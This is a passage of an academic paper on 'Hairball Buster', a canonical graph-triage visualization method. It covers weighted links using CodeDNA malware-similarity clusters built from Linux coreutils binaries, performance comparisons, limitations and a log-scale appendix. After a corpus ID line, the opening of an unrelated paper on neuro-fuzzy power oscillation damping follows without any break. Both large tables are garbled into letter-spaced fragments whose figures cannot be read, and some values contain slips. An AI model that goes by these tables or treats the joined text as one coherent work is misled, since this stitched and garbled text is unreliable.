link weights This section shows how HB can be used to identify key relationships in graphs with link weights. This example uses output data from a tool called CodeDNA™, a patented malware analysis tool developed at JHU/APL that provides a fast, reliable, automated means for recognizing related malware binaries and linking variants. It ‘supports crowd- sourcing of information by providing a robust malware identifier (fingerprint) that is deterministic and repeatable for correlating reports, analyses, and other information about attackers, yet cannot be used to re-create the original malware’ (Maughan and Carlsten, 2018). By generating DNA-like fingerprints from input files, and computing similarity between these fingerprints, CodeDNA™ can effectively identify clusters of related malware in very large data sets. Figure 18 shows some samples of clusters of malware previously produced by CodeDNA™. For purposes of this paper, we obtained a data set based on Linux coreutils rather than real malware, and Figure 17: HB chart of suspended Iranian Twitter™ accounts, user-id replies, no retweets, first 200 nodes showing gaps among the top 3 and the next 40 nodes. processed the data through CodeDNA™ software. Figure 19 shows the seven clusters produced by CodeDNA™, where each cluster represents elements of the code that have ‘similarity scores’ between 0.6 and 1.0. A similarity score is an output of CodeDNA™ that determines how similar one code binary is to another code binary. In Figure 19, the red lines represent a similarity score of 1.0, meaning the code samples are nearly identical. The blue lines represent the score of 0.6, meaning that roughly 60% of the code is similar according to CodeDNA’s algorithms. The remaining links between the nodes are shaded between blue and red as the similarity score increases. Using 0.6 as the lowest similarity score that defines a related cluster, Figure 19 shows that the outputs divide into seven clusters. To challenge the HB approach, we selected the cluster that had the most nodes (27) and the most links (292). This is almost a fully connected graph, which would have 378 links. Figure 20 shows the first attempt at displaying this cluster’s data in HB. The problem is that many of the nodes have exactly the same rank, which makes it difficult to discern how the nodes relate to each other. It would also be useful to color code the similarity scores of each edge to provide further detail about how these nodes relate to each other. The solution is to offset the nodes slightly on the vertical in order to allow for each unique link between nodes to be displayed. In Figure 21, nodes with the same degree are increased or decreased by 0.1 so that the monotonically decreasing curve is maintained, 13 CONNECTIONS Figure 18: Sample chart of CodeDNA™ cluster outputs of malware binaries. and is centered on the original degree value. (If there are more than nine nodes with the same degree, use a smaller offset to fit them in between the next whole number degree rows.) We added a line to connect the nodes to make it easier to see the curve. In addition to the vertical offset, we further color- coded the similarity values of each link or edge. The following colors represent the different ranges of similarity scores: orange = 0.6 to 07, red = 0.7 to 0.8, green = 0.8 to 0.9, and purple = 0.9 to 1.0. Note that nodes 9 through 15 have high similarity scores, and a bit less similarity with nodes 7, 8, and 16, even though they share the same degree. Nodes 9 through 15 are Figure 19: Sample CodeDNA™ cluster outputs of Linux coreutils binaries. also similar to the nodes with degree 23. Likewise, nodes 20 through 24 are similar to each other and to the nodes with degree 23. Figure 22 highlights these areas of high similarity by placing purple boxes around them. HB algorithm is canonical The applications above have illustrated how hairball buster can be used to answer key analytic questions. We now move on to a general discussion of the benefits of the approach and how it compares to similar existing techniques. 14 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs Figure 20: Sample CodeDNA™ cluster output in standard hairball buster (blue = nodes, gray dots = links). Figure 21: Sample CodeDNA™ cluster output in HB with vertical offset. HB is canonical in the sense that each graph has a unique visual representation. This consistency is a significant benefit, allowing different data sets, or different time slices of the same data set as in Section ‘third application: HB and temporal graphs,’ to be compared, regardless of size. To ensure uniqueness, the ranking of nodes by degree must be consistent, and this ordering must be chosen at the outset. The simplest way to do this is to assign a unique label to each node and sort them alphanumerically, thus ensuring a canonical display. This was done ‘behind the scenes’ in the above applications. 15 CONNECTIONS Another approach is to rank nodes that are tied by having the same degree by their connections to neighbors with the highest rank. For example, all of the one-degree nodes will be ‘tied’ with each other, but a tie-breaker is the degree of the node to which it is connected. If ties still exist after a first pass, then nodes can be ranked by the neighbor’s neighbors. Repeat as necessary. If there is still ambiguity between any nodes, simply assign a label to the node and republish the data set so all parties interested in that data set may use the same labels. HB measures of performance Many traditional graph layout approaches are computationally intensive because they position each node based on distance relative to every other node and on which nodes share (or are otherwise affected by) links. This N2 computation means that significant time is required to render a single ‘hairball’ graph with several thousand nodes, and many additional computationally intensive steps may be required to break the hairball into something more readily understandable. In contrast, the HB algorithm has order N log N. For small data sets such as the Jazz data set, on a single-threaded laptop there is no noticeable difference in the performance between the two. For large data sets such as the Twitter™ data set with over 200,000 nodes, however, the difference between N2 and N Log N becomes very significant. Table 1 shows experimental results. While the run time is similar for HB and backbone for small data sets, the larger the data set, the better HB performs compared to backbone layout. For 500K nodes, backbone could not complete in 20 min, whereas HB completed in less than 30 sec. Moreover, HB consistently completed for graphs of 1 million nodes in around 45 sec, whereas the backbone algorithm could not be tested because visone could not load this volume of data. The HB approach uses Python code to calculate the curves and neighbors from networks defined in standard graphml or csv form. It then creates Cartesian plots for the actual visualization. The approach could be probably executed much faster if optimized and parallelized. In HB, every node and neighbor’s location is well defined, easily calculated, and does not change significantly when a new set of nodes or links are added. It does not answer every question, but can identify features that help effectively target what subsets of nodes to use as inputs to more computationally intensive algorithms that do answer deeper questions. HB using other measures of centrality In addition to degree, HB can also display the rank of the nodes by other centrality measures. These expand the type of questions that can be answered by analysts using HB. Figure 22: Sample CodeDNA™ cluster output in HB with vertical offset and highlighting nodes with highest similarity scores. 16 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs T a b le 1 . P e rf o rm a n c e c a lc u la ti o n s c o m p a ri so n s fo r H B v s b a c k b o n e la yo u t. D a ta s e ts h b r u n t im e ( s) vi so n e r u n t im e – q u a d S im ( s) vi so n e r u n t im e – t ri S im ( s) F ile n a m e F ile s iz e (B ) N o . o f n o d e s N o . o f e d g e s 1 2 3 A vg 1 2 3 A vg 1 2 3 A vg ra n d o m -1 0 0 0 - n o d es .g ra p h m l 3 4 1 ,3 6 5 1 ,0 0 0 5 ,0 0 2 0 .2 5 0 .2 5 0 .2 5 0 .2 5 2 .0 1 .7 1 .6 1 .8 1 .5 1 .1 1 .3 1 .3 ra n d o m -1 0 0 0 0 - n o d es .g ra p h m l 3 ,5 5 5 ,9 1 5 1 0 ,0 0 0 4 9 ,8 2 6 0 .6 7 0 .6 9 0 .7 0 0 .6 9 7 .3 6 .9 6 .8 7 .0 7 .0 7 .1 6 .8 7 .0 ra n d o m - 1 0 0 0 0 0 -n o d es . g ra p h m l 3 7 ,2 7 1 ,2 2 4 1 0 0 ,0 0 0 5 0 0 ,0 6 1 1 0 .0 1 1 1 .7 4 6 .5 5 9 .4 3 1 3 9 .4 1 2 0 .1 1 1 8 .5 1 2 6 .0 1 2 9 .0 1 1 9 .7 1 1 9 .1 1 2 2 .6 ra n d o m - 2 5 0 0 0 0 -n o d es . g ra p h m l 9 5 ,4 5 2 ,8 4 1 2 5 0 ,0 0 0 1 ,2 5 0 ,4 8 7 1 6 .8 4 1 5 .3 6 1 5 .2 4 1 5 .8 1 3 4 9 .3 3 5 7 .3 3 6 1 .3 3 5 6 .0 3 5 6 .8 3 5 2 .7 3 3 4 .5 3 4 8 .0 ra n d o m - 5 0 0 0 0 0 -n o d es . g ra p h m l 1 9 3 ,2 6 3 ,3 3 9 5 0 0 ,0 0 0 2 ,5 0 1 ,3 4 6 2 6 .2 1 2 5 .7 1 2 4 .4 7 2 5 .4 6 > 1 ,2 0 0 ra n d o m - 1 0 0 0 0 0 0 -n o d es . g ra p h m l 3 8 8 ,4 6 1 ,0 4 3 1 ,0 0 0 ,0 0 0 4 ,9 9 7 ,0 8 9 4 4 .2 5 4 3 .7 5 4 5 .1 9 4 4 .4 0 V is o n e co u ld n o t lo ad g ra p h m l f ile . In su ffi ci en t m em o ry co d e- d n a. g ra p h m l 1 5 5 ,2 2 2 2 8 2 9 2 < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec ja zz -d ire ct ed . g ra p h m l 3 6 1 ,7 9 6 1 9 8 4 ,1 1 3 < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec < 1 s ec to st er _C A _ E d g e. g ra p h m l 5 ,3 4 9 ,8 6 1 2 3 ,9 1 6 7 5 ,0 5 0 1 .0 2 0 .9 6 0 .9 6 0 .9 8 2 0 .6 1 9 .8 2 0 .1 2 0 .2 1 7 .1 1 8 .9 1 7 .8 1 7 .9 ira n -t w ee t- re p lie s. n o -r et w ee t. b y- u se rid . g ra p h m l 2 9 4 ,1 5 3 ,4 8 4 2 2 8 ,6 2 6 4 4 0 ,2 4 4 1 .2 6 1 .1 2 1 .1 3 1 .1 7 > 1 ,2 0 0 17 CONNECTIONS node relationships and graph characteristics, (ii) representing large or directed networks or graphs with weighted links, and (iii) the ability to represent other centrality measures and representing graphs in a standard format at low calculation cost. These are used to compare HB with several other techniques: a histogram of node centralities, a standard force- directed layout, a backbone layout, a standard adjacency matrix with nodes sorted by degree, and an adjacency matrix where nodes have been ordered based on clusters (i.e. blockmodeling). The histogram does not provide information about neighbors, connectivity, number of clusters, weighted links, or directedness. Similarly, the adjacency matrix cannot represent centrality measures other than degree, has no visual cues for comparing one node’s degree to its neighbors or finding clusters, is not usable for very large data sets, and has no log–log or semi–log representation. (This paper assumes that the adjacency matrix has already been sorted by degree in terms of both rows and columns in order to compare well against HB.) While blockmodeling can depict the number of clusters in a graph, it cannot represent other centrality measures, log–log or semi–log representation, is not canonical, and requires a large number of calculations. Moreover, even when successfully representing clusters, blockmodeling works well only when there are several communities highly connected within blocks and having only sparse connections between blocks. Blockmodeling requires at least N2 calculations, and most references cite N3 calculations being required (White et al., 1976; Wasserman and Faust, 1994; Girvan and Newman, 2002; Jackson, 2010; Gopalan et al., 2012). While force-directed and backbone layout visualizations can show some clustering, they cannot provide the distribution of nodes by degree and the We focused on the following measures. The clique count of a node with N neighbors as the count of the N 2     neighbor pairs that are connected. The clique count (order 2) is the number of node pairs within distance 2 of the node that are connected. The decay centrality of a node i is the weighted sum decay (i) = ∑ j≠i δl(i,j), where δ is a decay parameter and l(i,j) is the minimum distance from i to j (or infinite if the nodes are in different components). The betweenness centrality of a node measures how likely the node is to lie along the shortest paths between other nodes in the graph. More details on these centrality measures are available in the studies of Wasserman and Faust (1994) and Jackson (2010). Figure 23 shows the HB visual for each of these measures for both the jazz data set and a randomly generated graph. The resulting figures emphasize how a node’s centrality measure is related to those of its neighbors. Each chart illustrates major structural differences between the jazz graph and a random graph. For example, in the decay centrality figures, the centrality of neighbors in the jazz data sets differs significantly, whereas in the random graph case the decay centrality of neighbors is very similar (note the vertical axis shows values between 52 and 61 only). These examples also show how HB can be applied to floating point as well as integer-valued metrics. (Note that some metric calculations, betweenness centrality in particular, are computationally expensive and may negate some of the performance advantages of the HB approach.) Comparing HB to other algorithms This section describes how HB differs from other commonly used graph analytic and visualization algorithms. Table 2 lists 14 analytic questions and features grouped into three sections: (i) understanding Figure 23: Displaying different measures of centrality in HB. Graph Degree Distribution Degree Centrality Clique Count Clique Count (order 2)1 Decay Centrality (decay parameter 0.5) Betweenness Centrality2 Jazz N = 198, E = 2742 Random Edges N = 198, E = 2742 1. Order 2 means displaying the number of triangles in the subgraph formed from all nodes within two hops of the chosen node 2. Betweenness Centrality is expensive to compute, so this version of the plot lacks the benefit of fast computation 18 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs T a b le 2 . C o m p a ri n g H B f e a tu re s to o th e r g ra p h a n a ly ti c a n d v is u a liz a ti o n a lg o ri th m s. F e a tu re H a ir b a ll b u st e r H is to g ra m / n o d e -d e g re e d is p la y F o rc e - d ir e c te d V is o n e b a c k b o n e A d ja c e n c y m a tr ix B lo c k m o d e lin g U n d er st an d in g n o d e re la tio n sh ip s an d g ra p h c h ar ac te ris tic s 1 . D is tr ib u tio n o f n o d es b y d eg re e Y es Y es N o N o N o f N o f 2 . Q u ic kl y d et er m in e th e n u m b er o f h ig h -d eg re e n o d es Y es Y es N o N o Y es N o f 3 . Q u ic kl y id en tif y w h ic h a re t h e h ig h es t d eg re e n o d es Y es Y es a N o b N o Y es Y es 4 . D et er m in e if th e h ig h es t d eg re e n o d es a re d ire ct ly c o n n ec te d t o o th er h ig h -d eg re e n o d es Y es N o Y es c N o b Y es Y es 5 . D et er m in e w h et h er t h e h ig h es t d eg re e n o d es a re c o n n ec te d t o ea ch o th er in d ire ct ly v ia t w o h o p s Y es N o Y es Y es c Y es Y es 6 . D et er m in e w h ic h lo w er -d eg re e n o d es a re d ire ct ly c o n n ec te d t o th e h ig h -d eg re e n o d es Y es N o Y es Y es Y es Y es 7 . P ro vi d e vi su al c u e o f h o w m u ch d iff er en ce e xi st s b et w ee n t h e d eg re e o f th e n o d es , es p ec ia lly h ig h -d eg re e n o d es Y es Y es N o N o N o Y es 8 . D et er m in e if th er e is o n e ce n tr al c lu st er o r m an y cl u st er s th at co n ta in t h e h ig h es t d eg re e n o d es Y es N o Y es Y es N o Y es R ep re se n tin g la rg e o r d ire ct ed n et w o rk s, o r w ith w ei g h te d li n ks 9 . P ro vi d e lo g –l o g o r se m i– lo g r ep re se n ta tio n fo r ve ry la rg e d at a se ts Y es Y es N o N o N o N o 1 0 . C an v is u al iz e b o th d ire ct ed a n d u n d ire ct ed g ra p h s Y es N o Y es e Y es e Y es Y es 1 1 . D et er m in e w h ic h n o d es c o n n ec t to t h e h ig h es t w ei g h te d li n ks Y es N o Y es d Y es Y es g Y es g O th er c en tr al ity m ea su re s, s ta n d ar d f o rm at , lo w c al cu la tio n c o st 1 2 . D is tr ib u tio n o f n o d es b y o th er c en tr al ity m ea su re s Y es Y es N o N o N o N o 1 3 . P ro vi d e a ca n o n ic al r ep re se n ta tio n o f th e g ra p h Y es Y es N o N o Y es N o 1 4 . L o w c al cu la tio n c o st Y es Y es N o N o Y es N o h N o te s: a If d is p la ye d o r av ai la b le v ia t o o lti p d is p la y; b ex ce p t fo r ve ry s m al l d at a se ts ; c fo r sm al l g ra p h s o r w h en e d g e s ar e n o t o cc lu d ed ; d in s o m e ca se s; e if lin k w ei g h ts d is p la ye d , e. g ., b y co lo r o r w id th ; f u n le ss o n e ca n c o u n t n u m b er o f n o d e o r lin ks v er y ca re fu lly ; g if lin k w ei g h ts d is p la ye d a s at tr ib u te s o f d o ts in t h e m at rix ; h o rd er a t le as t N 2 a n d m o st r ef er en ce s st at e N 3 . 19 CONNECTIONS number and identity of highest degree nodes or their direct connectivity to other high-degree nodes except in very small data sets. There are also no visual cues as to how much larger one node’s degree is compared to another high-degree node. Moreover, they do not represent other measures of centrality, are not canonical, and require at least N2 calculation cost. As shown in Table 2, the only algorithms that can come close to the HB analytic triage approach in terms of computation time is the adjacency matrix and the node-degree distribution or histogram display. Even then, the histogram cannot address six of the features available in HB, while the adjacency matrix cannot address four. Overall, HB efficiently presents information about a graph in a single display that is not available in any other single display. We also compared these approaches visually. Figure 24 illustrates five graphs using force-based layout, a histogram, an adjacency matrix, and HB. We have shown in previous sections the variety of questions that can be answered using HB. In contrast, there is little that can be determined directly from the force-based layout except for maybe the preferential attachment graph. While the histogram correlates well with the HB curve, the histogram provides no data whatsoever about the neighbors of the nodes. The adjacency matrix shows little in the way of patterns in these examples, except for the third and fourth graph, although this may be improved by using other node orderings such as those obtained in blockmodeling. An interesting characteristic of HB not previously discussed is also shown in the proximity graph. It is clear from the histogram that the distribution is bimodal, and the adjacency matrix shows a blob in the lower left corner. HB shows not only the cluster in the upper-left corner where most of the high-degree nodes are interconnected, but also that this cluster is mostly disconnected from other parts of the graph; this could not be discovered from the histogram and is difficult to ascertain from the adjacency matrix. Optional steps of the HB algorithm Section ‘HB approach’ presented the six basic steps of the HB algorithm. This section describes four optional steps mentioned in the previous use cases: 1. If one requires the HB chart to be canonical, then rank nodes of the same degree in lexico- graphic ordering based on the node labels. 2. Display the inverse (the gaps) of links to the neighbors. 3. Display a log–log or semi–log chart. Figure 24: Comparing different types of graphs and algorithms. Graph Type Force-Based Layout Distribution Adjacency Matrix Neighbor-Metric Plot (HB) Jazz N = 198, E = 2742 Random Edges N = 200, E = 400 Watts-Strogatz Random Graph N = 200, E = 400 Proximity Graph N = 200, E = 401 Preferential Attachment N = 200, E = 379 20 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs 4. Display nodes with the same metric value us- ing vertical offsets. Displaying the inverse is performed at the time the chart is rendered. Rather than displaying the neighbor nodes at their specified X and Y coordinates, display dots where there is no neighbor node, as shown in Figures 10 and 11. Displaying a log–log or semi–log chart benefits from offsetting the origin by 10,10 or 100,100 depending on the size of the original data set, as described in the Appendix. Displaying multiple nodes with the same centrality measure using vertical offsets makes relationships easier to see. In this case, select the nodes of the same centrality that are of interest, as shown in Figures 21 and 22. Calculate the size of the offset based on the number of curve nodes with the same Y coordinate that need to fit within the space 0.5 above and 0.5 below the Y-value. Limitations of HB At the time of this writing, we have identified four limitations of the HB approach. First, if there are two or more nodes with the same degree (or other centrality measure), even though each node on the curve will have a different rank (X-coordinate), their neighbor nodes may land on top of each other. This reduces the ability of the HB display to allow an analyst to clearly see how the nodes and their neighbors relate to each other, as well as more difficult to identify which high- degree nodes are connected by two hops. To address this limitation, the HB algorithm and code allows for vertical offsets for nodes that share the same degree, as described in Section ‘optional steps of the HB algorithm.’ Note that for most social networks, the high-degree nodes tend not to share the same degree, and when they do, usually only a small number share the same degree. For the low- degree nodes, there is little interest in identifying whether one-degree nodes are sharing the same row. If there is a dot above it, then that one-degree node is connected to that higher-degree node. If there is no dot about it, then that node is connected to another one-degree node and not connected to the rest of the graph and is an outlier. The second limitation is that if the graph has multiple links per pair of nodes, as in a multirelational network (Zweig, 2016), then those will not appear on the HB chart. To address this, one could translate the number of links into a link weight and color-code the weights as shown in Figures 21 and 22. However, if the multiple links each have their own weights, most approaches – including HB, the adjacency matrix, and blockmodeling – would be unable to represent the weights. Third, HB is not designed to represent loops, or nodes that connect to themselves. While this is not usually an issue for social network graphs, it is a limitation for the basic HB algorithm. One could apply workarounds, such as a vertical offset if not otherwise being used in this HB case, or one could extend the HB display to a third dimension. Fourth, while Figure 9, for example, provides a clear indication of which nodes have the highest degree and whether they are highly connected to other (neighbor) nodes, it can be difficult to identify exactly which of the highest degree nodes are connected to each other due to the large number of nodes being displayed. To solve this display problem, we recommend taking the inverse and displaying the gaps when encountering situations with very large numbers of highly connected nodes, as well as displaying the top 1% of the highest-ranked nodes. (This requires no new calculations – just selecting the range of top nodes to zoom in on.) Figure 10 is an example of applying this solution, and clearly shows how few links are missing from the top 20 nodes to be fully connected. When to use HB Given the strengths and limitations of the HB approach, when should an analyst use or not use HB? The authors recommend that HB be used as the initial algorithm to apply to a data set because of its information density and computational efficiency. As a triage method, HB can provide in the first pass the number of highest degree nodes, how they relate to each other, and how they relate to their neighbors. For graphs with large number of nodes that cannot be visually separated in the full HB plot, zooming in on the top nodes provides a computationally inexpensive way to get the same information. The results of this triage can indicate areas of particular interest, such as gaps in the curve or neighbor nodes. Moreover, if a graph reference library (see Section ‘future features and applications of HB’) is available, the new, unknown data set can be quickly compared to its closest matches of known data sets, thereby suggesting likely underlying structures and algorithms to try next. HB may be less useful for very small graphs, when the structure of the graph is already well-understood, when an analyst already knows exactly what metrics to compute, or, as indicated by the limitations above (Section ‘limitations of HB’), when the graph structure 21 CONNECTIONS includes multiple links per node pair or links that loop back to the same node. Future features and applications of HB The first planned future feature is to create a graph reference library (GRL) to compare new, unknown graphs to a set of graphs whose underlying structure is known. For example, curves generated by exponential random graph models (ERGMs) will appear different from known social media data curves. Once the known curves closest to the unknown curve have been identified, one can also display their neighbors and compare the neighbor distribution to the unknown graph neighbor distribution. This can provide a significant benefit to an analyst by quickly recommending known graphs to consider when analyzing a new graph to better understand its underlying structure. This comparison approach could also be automated or semi- automated by using convolutional neural networks to make these comparisons more thoroughly. Note that such a broad range of comparisons is possible because the HB representation is canonical. Creation of the GRL and the ability to display multiple curves on the same chart for purposes of comparison will be addressed in a subsequent paper. One proposed visualization approach is to provide cross-highlighting or ‘brushing’ capabilities among different types of displays. For example, mousing over the HB display could not only provide additional information as tooltips, but by connecting to other display types such as backbone layout, also highlight the same nodes in other displays. This ability to cross- highlight selections in multiple displays would provide particular benefit in the examination of temporal displays, identifying which have changed positions in the curve and which have not. An alternative visualization approach for highlighting similarities and differences in temporal graphs is to highlight which nodes have not changed rank by more than one or two, and so on for a selected number of bands identifying such changes. This method of triage will also help analysts quickly focus on similarities and differences in temporal displays. Summary of advantages of HB Hairball buster (or node-neighbor centrality) is an approach that provides a computationally efficient approach to graph analytic triage. HB provides a unique, canonical representation of any node-link data set. The ability of HB to provide a standard representation allows different node-link data sets, or different time slices of the same data set, to be compared to identify anomalies or large structural changes. The computational efficiency of HB is on the order of M, where M is the number of links, plus N log N, where N is the number of nodes. Because of its computational efficiency, HB can act as a triage method to identify key features of a data set, including whether the curve appears more representative of a social network or a random graph. It can also be used to quickly identify how many high- degree nodes are in the graph, which are the highest ranked nodes, whether those nodes are connected to each other directly or by two hops, and how connected the higher ranked nodes are to the lower-ranked nodes. In addition to degree, HB can visualize graphs using other centrality measures such as clique count, decay centrality, and betweenness. This flexibility of HB to represent a wide range of centrality measures is a significant benefit to analysts. This paper also presented differences between HB and force-directed and backbone layout visualization algorithms. In each case, HB provides greater information density than other algorithms at lower or equal calculation cost. Overall, HB presents information about a graph in a single display that is not available in any other single display and can complement the analyst’s existing toolkit. Acknowledgments No external funding was used to develop the Hairball Buster approach and code. The Johns Hopkins University Applied Physical Laboratory (JHU/APL) funded a small internal research and development seedling project to develop the initial code in Python (developed by co-author Mark Matties) and Java (developed by co-author Elisha Peterson). The authors would also like to thank the following for providing data sets (Cetin Savkli for the Jazz player data set, Matt Elder and Janis Butkevics for the Toaster data, Bobby Seng for the CodeDNA™ data, and Mark Matties for the Iranian Twitter™ data), Marc Johnson for complexity algorithm citations, and Roger Butler for recognizing that the HB approach was canonical. References Bender-deMoll, S. and McFarland, D. A. 2006. The art and science of dynamic network visualization. Journal of Social Structure, 7. Brandes, U. and Corman, S. R. 2003. Visual unrolling of network evolution and the analysis of 22 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs dynamic discourse. Information Visualization, 2(1): 40–50, available at: https://doi.org/10.1057/palgrave. ivs.9500037. Freeman, L. C. 2000. Visualizing social networks. Journal of Social Structure, 1(1): 4, available at: https:// w w w.r e s e a r c h g a te.n e t /p r o fi l e / L i n to n _ Fr e e m a n / publication/242008428_Social_Network_Visualization_ Methods_of/links/57516bfc08ae02ac12759651.pdf. Fruchterman, T. M. J. and Reingold, E. M. 1991. Graph drawing by force-directed placement. Software: Practice and Experience, 21(11): 1129–1164, available at: https://doi.org/10.1002/spe.4380211102. Ghoniem, M., Fekete, J.-D. and Castagliola, P. 2005. On the readability of graphs using node-link and matrix- based representations: a controlled experiment and statistical analysis. Information Visualization, 4(2): 114–135, available at: https://doi.org/10.1057/palgrave.ivs.9500092. Girvan, M. and Newman, M. E. J. 2002. Community structure in social and biological networks. Proceedings of the National Academy of Sciences, 99(12): 7821–7826, available at: https://doi.org/10.1073/pnas.122653799. Gleiser, P. and Danon, L. 2003. Adv. Complex Syst.6, 565, available at: http://deim.urv.cat/~alexandre.arenas/ data/welcome.htm as cited on the Konect website: http://konect.uni-koblenz.de/networks/arenas-jazz. Gleiser, P. M. and Danon, L. 2003. Community structure in jazz. Advances in Complex Systems 6(4): 565–573, available at: https://www.worldscientific. com/doi/abs/10.1142/S0219525903001067. Gopalan, P. K., Gerrish, S., Freedman, M., Blei, D. M. and Mimno, D. M. 2012. Scalable inference of overlapping communities. In Pereira, F., Burges, C. J. C., Bottou, L. and Weinberger, K. Q. (Eds), Advances in Neural Information Processing Systems. MIT Press, Cambridge MA, pp. 2249–2257, available at: http:// papers.nips.cc/paper/4573-scalable-inference-of- overlapping-communities.pdf. Jackson, M. O. 2010. Social and Economic Networks, Princeton University Press, Princeton and Oxford. Kamada, T. and Kawai, S. 1989. An algorithm for drawing general undirected graphs. Information Processing Letters, 31(1): 7–15, available at: https://doi. org/10.1016/0020-0190(89)90102-6. Lehmann, K. A. and Kottler, S. 2007. Visualizing large and clustered networks. In Kaufmann, M. and Wagner, D. (Eds), Graph Drawing. Springer, Berlin and Heidelberg, pp. 240–251. Maughan, D. and Carlsten, N. 2018. Transition to Practice Technology Guide. Department of Homeland Security Washington DC, available at: https://www. dhs.gov/sites/default /files/publications/CSD_T TP_ Guide_2018_webversion_06262018_508%20Final.pdf. Moody, J., McFarland, D. and Bender-deMoll, S. 2005. Dynamic network visualization. American Journal of Sociology, 110(4): 1206–1241, https://doi. org/10.1086/421509. Nocaj, A., Ortmann, M. and Brandes, U. 2014. Untangling hairballs. In Duncan, C. and Symvonis, A. (Eds), Graph Drawing. Springer, Berlin and Heidelberg, pp. 101–112. Nocaj, A., Ortmann, M. and Brandes, U. 2015. Untangling the hairballs of multi-centered, small- world online social media networks. Journal of Graph Algorithms and Applications 19(2): 595–618, available at: https://doi.org/10.7155/jgaa.00370. Peterson, E. 2011. Time spring layout for visualization of dynamic social networks. 2011 IEEE Network Science Workshop, pp. 98–104, available at: https://doi.org/10.1109/NSW.2011.6004630. Sheny, Z. and Maz, K.-L. 2007. Path visualization for adjacency matrices. Proceedings of the 9th Joint Eurographics/IEEE VGTC Conference on Visualization, 83–90, available at: https://doi.org/10.2312/VisSym/ EuroVis07/083-090. Squartini, T., Mastrandrea, R. and Garlaschelli, D. 2015. Unbiased sampling of network ensembles. New Journal of Physics, 17(2): 023052, available at: https:// doi.org/10.1088/1367-2630/17/2/023052. Twitter™ 2018. Twitter™ website, data set regarding election integrity, PERISCOPE, SCOPE and the Periscope logo are trademarks of Twitter, Inc. or its affiliates, available at: https://about.twitter.com/ en_us/values/elections-integrity.html#data (accessed November 8, 2018). Ware, C. 2010. Visual Thinking: for Design. Elsevier, Amsterdam. Wasserman, S. and Faust, K. 1994. Social network analysis by Stanley Wasserman, Cambridge University Press, available at: https://doi.org/10.1017/ CBO9780511815478 (accessed October 29, 2019). White, H. C., Boorman, S. A. and Breiger, R. L. 1976. Social structure from multiple networks. I. blockmodels of roles and positions. American Journal of Sociology, 81(4): 730–780, available at: https://doi. org/10.1086/226141. Zweig, K. A. 2016. Network Analysis Literacy: a Practical Approach to the Analysis of Networks. Springer Science & Business Media, Wein, p. 115. 23 CONNECTIONS Appendix. Semi–log and log–log displays for the hairball buster approach For very large data sets, a Cartesian representa- tion of the HB algorithm may not be sufficient to encompass the whole data set. Although the HB approach has been successfully applied to data sets with over 600,000 nodes displayed on Carte- sian coordinates, there exist much larger data sets for which a semi–log or log–log display would be needed to represent all of the data in a single HB chart. (In this appendix, we will always be referring to log-base-10.) When simply taking the semi–log or log–log of a data set, we immediately discovered that the display is dominated by the first few nodes, leaving little visual benefit in the remaining part of the chart. See Figure A1 for an example of a log–log display based on the jazz player data set. This does not present particularly useful information to the analyst. However, there is an easy solution to this problem. By adding either 10 or 100 to all of the data points, we are essentially creating an ‘offset’ of the origin to point 10,10 or point 100,100. Figure A2 shows an offset of the origin to the point at coordinates 10,10 for the Jazz Player data set. Although a relatively small data set, Figure A1: Sample Log 10 –log 10 plot of jazz player data set with no offset. Figure A2: Sample offset of origin to 10,10 for Log 10 –log 10 plot of jazz player data set. 24 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs Figure A3: Sample offset of origin to 10,10 for semi–log plot of Toaster data set. this example shows how the offset of the origin allows a much smoother and continuous representation of the curve compared to Figure A1. (One needs to remember that when reading the chart, the origin has been offset.) Figure A3 shows the Toaster data set in semi–log format. No offset was needed because the log of one is 0. Since most of the connections are of degree 1, the origin of zero–zero works. However, the display tool the authors applied would not display anything at coordinate value of 0 for the Y-axis. Therefore, we placed the degree one nodes at the lowest Y-value on the semi–log display. work_5s3bn533p5dixbjmrb6kr6wn5e ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 17 Anfis Coordination of Changes In Power Oscillation Damper Parameters with Variation In Power System Operating Point Dr I. I. Alabi Department of Electrical/Electronic Engineering Nigerian Defence Academy. Kaduna. Nigeria e-mail: alabiibitayo@yahoo.com Dr A. I. Araga, Mr Sabo Aliyu Department of Electrical/Electronic Engineering Nigerian Defence Academy. Kaduna. Nigeria e-mail: araga9393@gmail.com Abstract—In this paper an Adaptive Neuro-Fuzzy Controller was designed to adaptively adjust the parameters of a power Oscillation Damper as the power system operating point changes due to change in operating point in a large interconnected Network fitted with FACTS device and Power Oscillation Damper. As a foundational work the generalized mathematic model of multi-machine power system with embedded FACTS was developes. The results obtained clearly reveals the effectiveness of this approach. Keywords-Neuro-Fuzzy Controller; Mathematic Model; Oscillation Damper; Interconnected Network I. INTRODUCTION Most of the FACTS based damping controllers belong to the PI (Proportional + Integral) type and work effectively in single machine system [1]. However, the performance of the above mentioned damping controllers deteriorates in multi- machine power systems. The damping performance of the FACTS based damping controllers in multi-machine power systems can be improved by using fuzzy coordinated design [2]. Furthermore Power Oscillation Damper are designed for specific operating point, but operating point changes as demand changes for optimal performance the parameter of power oscillation damper must continually change with changes in operating point for this reason ANFIS is deployed to predict the future values of POD parameters based on large population of such parameters obtained from all possible operating scenarios. The structure of the proposed Adaptive Neuro Fuzzy coordinated controller is shown in Figure 1, where the inputs are speed deviation of synchronous machines and their acceleration. Thus, the conventional damping controllers are adaptively tuned by using ANFIS controllers. w w sT sT K 1 lag lead sT sT   1 1 lag lead sT sT   1 1 ANFIS POD ADAPTIVE PARAMETER LEADT LAG T OPERATING CONDITIONS 𝑉𝑝𝑜𝑑 𝑖 𝑈 𝑖 𝑃𝑖 𝑄𝑖 𝑉 𝑖 Figure 1. Proposed Adaptive POD Controller II. LITERATURE REVIEW An attempt has been made to apply hybrid neuro-fuzzy approach for the coordination between the conventional power oscillation damping (POD) controllers for multi- machine power systems. With the help of MATLAB, a class of adaptive networks, that are functionally equivalent to fuzzy inference systems, is proposed. The proposed architecture is referred to as ANFIS (Adaptive Neuro-Fuzzy Inference System) [2]-[6]. An adaptive fuzzy inference system (ANFIS) based UPFC supplementary damping controller to superimpose 